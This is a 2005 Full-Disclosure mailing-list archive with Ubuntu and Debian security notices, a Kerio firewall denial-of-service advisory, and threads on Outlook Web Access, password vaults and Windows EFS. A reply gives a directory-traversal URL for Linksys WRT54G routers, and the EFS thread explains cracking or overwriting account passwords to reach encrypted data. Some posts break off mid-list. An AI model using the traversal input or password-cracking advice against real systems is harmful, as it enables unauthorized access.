The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-2943 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005  Initial vendor notification
10/12/2005  Initial vendor response
10/13/2005  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Microsoft Outlook Web Access

[Vernocchi, Pablo]

Hi Petko,

BIF:9409 has a solution:
http://www.securityfocus.com/bid/9409/solution

Anyway, I recommend you to use MBSA (Microsoft Baseline Security Analyzer)
once a week, to check issues; or Retina as well.

Also, there's a tool called Microsoft Exchange Best Practices Analyzer tool
that may help you troubleshooting non standard configs or non recommended
configs.

http://www.microsoft.com/exchange/downloads/2003/exbpa/default.mspx

Regards,
PV


-Mensaje original-
De: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] En nombre de Petko Petkov
Enviado el: Jueves, 13 de Octubre de 2005 06:22 a.m.
Para: full-disclosure@lists.grok.org.uk
Asunto: [Full-disclosure] Microsoft Outlook Web Access

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
Hello there,
I've been messing around with Microsoft Outlook Web Access (SP1)
trying to test and see what I can do. I found several vulnerabilities
on google/securityfocus related to this particular version but non of
them seem to work. I went to Microsoft website and I can't see any
patches available. Well, there is one fix that I really don't know
what is for.

Does any one know if BID:12459 and BID:9409 had been fixed?
If not, is there a way to prevent those attacks from happening?

Thanks
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (MingW32)
 
iD8DBQFDTic+Ff/6vxAyUpgRAgWgAJ9d+hpQ650dOfoZiQljAFtfeZJJ5QCgv6bO
mCC1wAHPw4vcA1bKPe45KJY=
=+TZH
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-203-1] Abiword vulnerabilities

[Martin Pitt]

===
Ubuntu Security Notice USN-203-1   October 13, 2005
abiword vulnerabilities
CAN-2005-2972
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)

The following packages are affected:

abiword

The problem can be corrected by upgrading the affected package to
version 2.0.7+cvs.2004.05.05-1ubuntu3.3 (for Ubuntu 4.10), or
2.2.2-1ubuntu2.2 (for Ubuntu 5.04). After a standard system upgrade
you have to restart Abiword to effect the necessary changes.

Details follow:

Chris Evans discovered several buffer overflows in the RTF import
module of AbiWord. By tricking a user into opening an RTF file with
specially crafted long identifiers, an attacker could exploit this to
execute arbitrary code with the privileges of the AbiWord user.


Updated packages for Ubuntu 4.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword_2.0.7+cvs.2004.05.05-1ubuntu3.3.diff.gz
  Size/MD5:53513 e4e2d3d54c83a168e82d70b137ee057c

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword_2.0.7+cvs.2004.05.05-1ubuntu3.3.dsc
  Size/MD5: 1157 037c7c524016edeaa473c6c0d062bce8

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword_2.0.7+cvs.2004.05.05.orig.tar.gz
  Size/MD5: 21903248 665596f852d4e8d0c31c17fc292d6b29

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-doc_2.0.7+cvs.2004.05.05-1ubuntu3.3_all.deb
  Size/MD5:  4085668 6e2e530a16e993ad086d42956c5803c2

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-help_2.0.7+cvs.2004.05.05-1ubuntu3.3_all.deb
  Size/MD5:   543156 8bc408bd3ad1e666e5e357ae36e53932

http://security.ubuntu.com/ubuntu/pool/universe/a/abiword/xfonts-abi_2.0.7+cvs.2004.05.05-1ubuntu3.3_all.deb
  Size/MD5:16596 75430c23dad8ae4d0a7308265d408003

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-common_2.0.7+cvs.2004.05.05-1ubuntu3.3_amd64.deb
  Size/MD5:  1455334 d7e4f6e69c1b7a447efceaf04ff68ea0

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-gnome_2.0.7+cvs.2004.05.05-1ubuntu3.3_amd64.deb
  Size/MD5:  1989318 c268d65eb11b0b52fb60dcc9ba5bedd1

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-plugins-gnome_2.0.7+cvs.2004.05.05-1ubuntu3.3_amd64.deb
  Size/MD5:26802 b4fa13f3573367b2015988d4f18dc614

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-plugins_2.0.7+cvs.2004.05.05-1ubuntu3.3_amd64.deb
  Size/MD5:   367222 6474c5943df1fce5bead6694a1261d6a

http://security.ubuntu.com/ubuntu/pool/universe/a/abiword/abiword_2.0.7+cvs.2004.05.05-1ubuntu3.3_amd64.deb
  Size/MD5:  1991322 1af7def6dd93a82d2cec1e88ec2d4b5c

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-common_2.0.7+cvs.2004.05.05-1ubuntu3.3_i386.deb
  Size/MD5:  1453160 04cb3db059e360a88db13f1808559450

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-gnome_2.0.7+cvs.2004.05.05-1ubuntu3.3_i386.deb
  Size/MD5:  1872762 5e1e82e05a66130fa20bea41fbe095a6

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-plugins-gnome_2.0.7+cvs.2004.05.05-1ubuntu3.3_i386.deb
  Size/MD5:26478 f67599750d41755a8b78a04b1dbdde5f

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-plugins_2.0.7+cvs.2004.05.05-1ubuntu3.3_i386.deb
  Size/MD5:   351082 7da163ac9814bafa7973403a2b8c1193

http://security.ubuntu.com/ubuntu/pool/universe/a/abiword/abiword_2.0.7+cvs.2004.05.05-1ubuntu3.3_i386.deb
  Size/MD5:  1876422 e9d75623f08356390d4065d472f3c9c9

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-common_2.0.7+cvs.2004.05.05-1ubuntu3.3_powerpc.deb
  Size/MD5:  1453644 555f171b5a2d416145ec6c6127dbc5d8

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-gnome_2.0.7+cvs.2004.05.05-1ubuntu3.3_powerpc.deb
  Size/MD5:  1972602 46cbb19e7d0ba940af215f0db405bb14

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-plugins-gnome_2.0.7+cvs.2004.05.05-1ubuntu3.3_powerpc.deb
  Size/MD5:27940 e9583dbfa15f30f45f6112d0f75a6236

http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword-plugins_2.0.7+cvs.2004.05.05-1ubuntu3.3_powerpc.deb
  Size/MD5:   405638 170b9be3298268ec25ba858681a8fa16

http://security.ubuntu.com/ubuntu/pool/universe/a/abiword/abiword_2.0.7+cvs.2004.05.05-1ubuntu3.3_powerpc.deb
  Size/MD5:  1977814 e1ae70a2581e791bd387132ff6ed48c3

Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/a/abiword/abiword_2.2.2-1ubuntu2.2.diff.gz
  Size/MD5:   512286 4f9111c0c96189e819605417cef9

Re: [Full-disclosure] password vaults-

[Bart Lansing]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Someone else suggests that this may just be a troll...but I'll
answer it anyway:

Google is your friend, David.  Try googling for "password storage"
and weed through the 186,000 hits until you find the product you
need.

Cheers

On Wed, 12 Oct 2005 08:02:04 -0700 David Royer
<[EMAIL PROTECTED]> wrote:
>Sorry for the very noob question, but I'm having very hard times
>finding
>such products.
> I have the pleasure and the incredible chance to support generic
>(shared
>admin) passwords. I'm looking for a commercial product to manage
>the
>distribution and protection of these passwords. Must be RSA
>compatible and
>Active Directory (LDAP, to retrieve info and allow access). Also
>must be
>able to support web (https) for users to log in and get the
>passwords they
>are allowed to see.
> Best regards!
-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkNOZBEACgkQfw4CJpLBxOM4zgCdGmrlfefcpajJBeTofm73Z0JB6DgA
oL0whOvp1c48V/X3GhetVAc27F//
=1OYc
-END PGP SIGNATURE-




Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program: 
http://www.hushmail.com/about-affiliate?l=427

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] password vaults-

[Madison, Marc]

Are you talking about something like a password reset for the brilliant
end user, because somehow their password mysteriously doesn't work
anymore?  There are several vendors (Google something like automated
helpdesk password reset) that offer this type of technology, but they
will not show the end users current password just allow them to change
it. 


>Sorry for the very noob question, but I'm having very hard times
finding such products.
>I have the pleasure and the incredible chance to support generic
(shared
>admin) passwords. I'm looking for a commercial product to manage the
distribution and protection of these 
>passwords. Must be RSA compatible and Active Directory (LDAP, to
retrieve info and allow access). Also must be 
>able to support web (https) for users to log in and get the passwords
they are allowed to see.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] NEW USA FFIES Guidance

[Madison, Marc]

Did you read the full notice?  This link was at the bottom:
http://www.ffiec.gov/pdf/authentication_guidance.pdf in which the FFIEC
defines several ways to authenticate end users, but as Lyal Collins
pointed out it is all based on your company own risk assessment.


>For those that fall under US FFIEC governance, what are you doing to
satisfy these requirements?  I'd like to
>think I have more options than running to the store to pick up my RSA
keyfobs...  What about PKI?  Are there
>other. options for web based apps?
> 
>http://www.fdic.gov/news/news/financial/2005/fil10305.html
> 
>C. DeBerry

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Kerio Personal Firewall and Kerio Server Firewall FWDRV driver Local Denial of Service

[Piotr Bania]

Kerio Technologies Kerio Personal Firewall and Kerio Server
Firewall FWDRV driver
Local denial of service
by Piotr Bania <[EMAIL PROTECTED]>
http://pb.specialised.info



Original location:  
http://pb.specialised.info/all/adv/kerio-fwdrv-dos-adv.txt

Severity:   Low (local machine denial of service -
BSOD)


Software affected:  Tested on Kerio Personal Firewall 4
(4.2.0) and  KerioServerFirewall
version 1.1.1, however it is highly 


possible that earlier versions
are also vulnerable.



I.  BACKGROUND

From kerio.com website:

"Kerio Personal Firewall represents smart, easy-to-use personal
 security technology that fully protects personal computers
 against hackers and internal misuse"

"Kerio ServerFirewall offers IT and security administrators a
 powerful and easy-to-use tool to protect their server systems
 from worms, buffer-overflow and other internet security
 threats."


II. DESCRIPTION 

FWDRV driver (core part of the firewall system) monitors all
programs that are trying to connect to the internet. While doing
necessary checks, FWDRV parses the Process Environment Block
(PEB) like the code shows:


;--SNIP
.text:0041C04E  mov ecx, [ebp+var_4]  ; ECX = PEB base
.text:0041C051  mov edx, [ecx+0Ch]; EDX = PEB_LDR_DATA
;--SNIP


However while parsing the PEB FWDRV doesn't check if the memory
with Process Environment Block is accessible. It means that if
attacker will set PAGE_NOACCESS or PAGE_GUARD protection to the
PEB block the FWDRV will cause an fatal exception and the
machine will crash.


III. IMPACT

Sample scenario:
Executing connect api function with previously PAGE_NOACCESS
protection set to Process Environment Block will cause an local
machine crash.


IV. POC CODE

Sample POC code was released to vendor.


best regards,
Piotr Bania


--

Piotr Bania - <[EMAIL PROTECTED]> - 0xCD, 0x19
Fingerprint: 413E 51C7 912E 3D4E A62A  BFA4 1FF6 689F BE43 AC33
http://pb.specialised.info  - Key ID: 0xBE43AC33



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] On the linux kernel and stack randomization

[none none]

When did the mainline linux kernel implement these
changes? I cannot find ANY discussion on these changes
on the LKML? If someone can point me in the right
direction for a discussion on this it would be helpful
thanks.


>in >=2.6.12
># sysctl kernel.randomize_va_space
># cat /proc/self/maps
>
>

>-ed



__ 
Yahoo! Music Unlimited 
Access over 1 million songs. Try it free.
http://music.yahoo.com/unlimited/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WRT54G directory trasversial vulnerability

[Thierry Zoller]

Dear Shell,

S> http://192.168.1.1/apply.cgi?action=../
S> It loads the page after action
S> http://192.168.1.1/apply.cgi?action=../ returns the setup page
S> http://192.168.1.1/apply.cgi?action=../blah returns that the file does not 
exist

Could be reproduced while being autheticated.

-- 
Mit freundlichen Grüßen
Thierry Zoller
mailto:[EMAIL PROTECTED]


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WRT54G directory trasversial vulnerability

[Thierry Zoller]

Dear Shell,

S> I just found a vulnerability in Linksys WRT54G routers.
Could not reproduce, asks for BASIC authentification.

-- 
Thierry Zoller
mailto:[EMAIL PROTECTED]


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 865-1] New hylafax packages fix insecure temporary files

[Martin Schulze]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 865-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
October 13th, 2005  http://www.debian.org/security/faq
- --

Package: hylafax
Vulnerability  : insecure temporary files
Problem type   : local
Debian-specific: no
CVE ID : CAN-2005-3069
CERT advisory  : 
BugTraq ID : 
Debian Bug : 

Javier Fernández-Sanguino Peña discovered that several scripts of the
hylafax suite, a flexible client/server fax software, create temporary
files and directories in an insecure fashion, leaving them vulnerable
to symlink exploits.

For the old stable distribution (woody) this problem has been fixed in
version 4.1.1-3.2.

For the stable distribution (sarge) this problem has been fixed in
version 4.2.1-5sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 4.2.2-1.

We recommend that you upgrade your hylafax packages.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:

http://security.debian.org/pool/updates/main/h/hylafax/hylafax_4.1.1-3.2.dsc
  Size/MD5 checksum:  739 a26715f7b967614e4aa3afb4657fb20e

http://security.debian.org/pool/updates/main/h/hylafax/hylafax_4.1.1-3.2.diff.gz
  Size/MD5 checksum:   116099 ad9d74b7d995655df44c6a257cfb8e1f

http://security.debian.org/pool/updates/main/h/hylafax/hylafax_4.1.1.orig.tar.gz
  Size/MD5 checksum:  1287689 1ed081750be70a800708699b7568e17e

  Architecture independent components:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-doc_4.1.1-3.2_all.deb
  Size/MD5 checksum:   318302 49ee14fc07e1ca12ea191ec01209831f

  Alpha architecture:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-3.2_alpha.deb
  Size/MD5 checksum:   556336 2ca7177d8d4e45ad08052612d31e3286

http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-3.2_alpha.deb
  Size/MD5 checksum:  1362414 98b7c46d94841981577a46965982daf3

  ARM architecture:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-3.2_arm.deb
  Size/MD5 checksum:   445654 7fd22812bb3e50f5915a3d5ca56c3412

http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-3.2_arm.deb
  Size/MD5 checksum:  1095664 3b56df8d25e56adbf657f35f6add331d

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-3.2_i386.deb
  Size/MD5 checksum:   462410 1b6ef2d2bc9a013abc3ca5c88d9517ef

http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-3.2_i386.deb
  Size/MD5 checksum:  1132566 fe019575d929c90497da4da532dd0e14

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-3.2_ia64.deb
  Size/MD5 checksum:   615710 80614f594990528f32d72f29a25059aa

http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-3.2_ia64.deb
  Size/MD5 checksum:  1491748 1fefde2f9ef1e1f29f2f3e538746e826

  HP Precision architecture:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-3.2_hppa.deb
  Size/MD5 checksum:   501634 a6d82e052b47ec50dcb2074b97bc9118

http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-3.2_hppa.deb
  Size/MD5 checksum:  1231286 21b6141ceb425b35dca9ba8350cea477

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-3.2_m68k.deb
  Size/MD5 checksum:   451276 e7bcefc8e040c5dd61993cce93f8463f

http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-3.2_m68k.deb
  Size/MD5 checksum:  104 35967ff6911e340a8ad03677e314bdb6

  PowerPC architecture:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-3.2_powerpc.deb
  Size/MD5 checksum:   450830 a81c00ffe35a3596f2a1cba944e25369

http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-3.2_powerpc.deb
  Size/MD5 checksum:  1104318 49a486d5ad824024d1aee622f38bca9b

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-3.2_s390.deb
  Size/MD5 checksum:   441260 40081bae35

[Full-disclosure] Microsoft Outlook Web Access

[Petko Petkov]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
Hello there,
I've been messing around with Microsoft Outlook Web Access (SP1)
trying to test and see what I can do. I found several vulnerabilities
on google/securityfocus related to this particular version but non of
them seem to work. I went to Microsoft website and I can't see any
patches available. Well, there is one fix that I really don't know
what is for.

Does any one know if BID:12459 and BID:9409 had been fixed?
If not, is there a way to prevent those attacks from happening?

Thanks
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (MingW32)
 
iD8DBQFDTic+Ff/6vxAyUpgRAgWgAJ9d+hpQ650dOfoZiQljAFtfeZJJ5QCgv6bO
mCC1wAHPw4vcA1bKPe45KJY=
=+TZH
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft EFS

[Fco. Jose Garrido Matamoros]

Look this (small guide to crack, not overwrite, cached domain password)

http://antionline.com/printthread.php?threadid=266698&pagenumber=1


El Miércoles, 12 de Octubre de 2005 13:19, Fco. Jose Garrido Matamoros 
escribió:
> Sorry for my english! I don't understand "nounce" password.
>
> You can try to crack the cached domain/active directory password (if the
> CachedLogonCounts isn't set to 0).
>
> Best regards
>
> El Martes, 11 de Octubre de 2005 19:03, Dyke, Tim escribió:
> > > The DEFAULT recovery agent is the Administrator, on the other hand you
> >
> > always
> >
> > > can to decrypt the data from the userX login like that userX; So crack
> >
> > the
> >
> > > password or overwrite it off-line (the same for the delegated recovery
> > >
> > > agent).
> >
> > Tom wrote"
> > be careful:
> >
> > overwriting the pw offline will work with efs on w2k.
> > it will not work with winxp/2003: you cant access any efs-data after
> > resetting the password offline.
> >
> > you'll have to crack the usesrs or the admins pw and either logon
> > interactively or export their keys to get access to the efs-encrypted
> > data.
> >
> > Tom"
> >
> > Do you know how his will work for a machine that is part of a Domain?
> > Where there are no Local Users and the Default Recovery Agent is the
> > "Domain Admin"
> >
> > I know tht one can always hack the local admin PW, then unjoin the
> > domain, but where does that leave the machine.
> > Is there any way to hack the "nounce" PW?
> >
> > Thanks
> >
> > Tim

-- 
Fco. Jose Garrido Matamoros
Ingeniero Sup. Telecomunicacion

TecVD - Seguridad y Control de Sistemas de Informacion
http://www.tecvd.com

NOTA.- Las tildes de este mensaje han sido omitidas expresamente para evitar
cualquier tipo de alteracion en los caracteres del texto.


**AVISO LEGAL**

Este mensaje es privado y confidencial y solamente para la persona a la 
que va dirigido. Si usted ha recibido este mensaje por error, no debe 
revelar, copiar, distribuir o usarlo en ningun sentido. Le rogamos lo 
comunique al remitente y borre dicho mensaje y cualquier documento 
adjunto que pudiera contener. No hay renuncia a la confidencialidad ni a 
ningun privilegio por causa de transmision erronea o mal funcionamiento. 
Cualquier opinion expresada en este mensaje pertenece unicamente al autor 
remitente, y no representa necesariamente la opinion de Tecnologias de 
Vigilancia y Deteccion, S.L., a no ser que expresamente se diga y el 
remitente este autorizado para hacerlo. 
Los correos electronicos no son seguros, no garantizan la confidencialidad 
ni la correcta recepcion de los mismos, dado que pueden ser interceptados, 
manipulados, destruidos, llegar con demora, incompletos, o con virus. 
Tecnologias de Vigilancia y Deteccion, S.L. no se hace responsable de las 
alteraciones que pudieran hacerse al mensaje una vez enviado. Este mensaje 
solo tiene una finalidad de informacion, y no debe interpretarse como una 
oferta de venta o de compra de cualquier producto o servicio. En el caso 
de que el destinatario de este mensaje no consintiera la utilizacion del 
correo electronico via Internet, rogamos lo ponga en nuestro conocimiento.

Se le informa que los datos de caracter personal que libremente 
suministre pueden ser incluidos en un fichero para facilitar la oferta de 
servicios y/o productos basados en las preferencias y requerimientos que 
comunique. En todo caso le asiste el derecho de acceso, rectificacion, 
cancelacion u oposicion al tratamiento de esos datos; para ejercer estos 
derechos debe dirigirse por escrito adjuntando fotocopia de DNI, o documento
equivalente, a la sede de la empresa.


**DISCLAIMER**

This message is private and confidential and it is intended exclusively for 
the addressee. If you receive this message by mistake, you should not 
disseminate, distribute or copy this e-mail. Please inform the sender and 
delete the message and attachments from your system. No confidentiality 
nor any privilege regarding the information is waived or lost by any 
mistransmission or malfunction. 
Any views or opinions contained in this message are solely those of the 
author, and do not necessarily represent those of Tecnologias de Vigilancia 
y Deteccion, S.L., unless otherwise specifically stated and the sender is 
authorised to do so. 
E-mail transmission cannot be guaranteed to be secure, confidential, or 
error-free, as information could be intercepted, corrupted, lost, 
destroyed, arrive late, incomplete, or contain viruses. Tecnologias de 
Vigilancia y Deteccion, S.L. does not accept responsibility for any changes 
in the contents of this message after it has been sent. 
This message is provided for informational purposes and should not be 
construed as a solicitation or offer to buy or sell any product or service. 
If the addressee of this message does not consent to the use of internet 
e-mail, please communicate it to us.


pgpfy1pgCUjSL.pgp